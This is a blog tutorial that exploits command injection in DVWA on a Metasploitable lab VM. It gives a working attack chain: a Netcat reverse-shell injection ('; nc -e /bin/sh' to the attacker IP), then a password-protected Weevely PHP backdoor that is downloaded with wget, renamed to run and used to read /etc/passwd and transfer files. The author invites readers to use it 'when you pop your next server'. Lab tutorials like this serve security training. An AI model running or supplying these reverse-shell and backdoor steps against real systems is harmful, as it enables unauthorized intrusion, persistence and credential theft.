Create a Back Door with Kali, Netcat and Weevely – LSB

Welcome back my budding hackers. We hope you enjoy this security tutorial by our ethical hacker QuBits. Our network is below.

network

We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.

wee1

To start with, change the security settings from high to low on DVWA Security Tab above.

wee2

Next we will need to move to the Command Execution module. The page just does a ping scan. so let’s try it.

wee3

We will enter an IP address and click on submit.

REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!

wee4

Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:

nc -vv -l -p 8888 (8888 is the port we want to listen on)

wee5

Next, in DVWA, type any IP then ; then nc -e /bin/sh 192.168.56.103 8888 and connect with Kali machine from website as seen below.

wee6

Connection established, we have full control of the web app.

wee7

 

$299 WILL ENROLL YOU IN OUR SELF PACED COURSE – LFS205 – ADMINISTERING LINUX ON AZURE!

Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.

First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:

weevely generate 123456 /root/shell.txt. 123456 will be our password which we will use later.

wee8

Copy it to:

cp /root/shell.txt /var/www/html so we can see it in our browser.

wee9

Make sure it’s copied. shell.txt is in /var/www/html. We can see shell.txt on the right hand side.

wee10

Next we start the server on the Kali machine. Start the server:

service apache2 start

wee11

On Kali browser go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm file is there.

wee12

We still  have a netcat connection on the server so we can wget our shell.txt file:

wget http://192.168.56.103/shell.txt and the shell.txt should show uploaded

wee13

The file has been uploaded, next we need to change it to php extension for it to run.

Mv shell.txt shell.php

wee18

Connect to the upload in Kali:

weevely http://192.168.56.101/dvwa/vulnerabilities/shell.php 123456

 

wee20

We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.

:help this will give you a list of commands you can run on your back door. Interesting ones are:

:system_info

wee21

cat /etc/passwd

wee22

Another interesting command we can use is :audit_etcpasswd -vector <option>

To upload a file to the target system:

:file_download rpath is remote path and lpath for local.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13

BUNDLE CLOUD FOUNDRY FOR DEVELOPERS COURSE(LFD232) AND THE CFCD CERTIFICATION FOR $499!

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.